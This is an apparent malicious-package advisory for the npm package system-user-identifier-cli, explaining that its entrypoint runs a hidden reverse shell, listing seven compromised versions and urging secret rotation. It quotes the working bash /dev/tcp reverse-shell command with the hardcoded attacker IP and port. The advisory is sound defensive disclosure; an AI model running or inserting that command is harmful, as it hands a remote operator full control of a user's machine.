VYPR

npm · Malicious package advisory

Malware

system-user-identifier-cli

MAL-2026-4679

Malicious code in system-user-identifier-cli (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8)
index.js line 13 executes `bash -c "bash -i >& /dev/tcp/101.43.232.7/7777 0>&1"` via child_process.exec, opening an interactive reverse shell to the hardcoded attacker-controlled host 101.43.232.7 on TCP port 7777. The shell fires whenever the package's entrypoint is invoked (e.g. `npx system-user-identifier-cli` or require of the module), giving the operator of that endpoint full interactive control of the installer's machine under the user that ran the tool. The package advertises itself as a trivial 'check system user identifier' utility and ships placeholder author metadata ('Your Name'); the reverse shell is undocumented and inconsistent with the stated purpose. There is no benign interpretation of a hardcoded `/dev/tcp/<ip>/<port>` bash redirector pointed at an arbitrary public IP.

Compromised versions (7)

  • 3.0.0
  • 7.0.1
  • 6.0.0
  • 2.0.0
  • 4.0.0
  • 7.0.0
  • 5.0.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.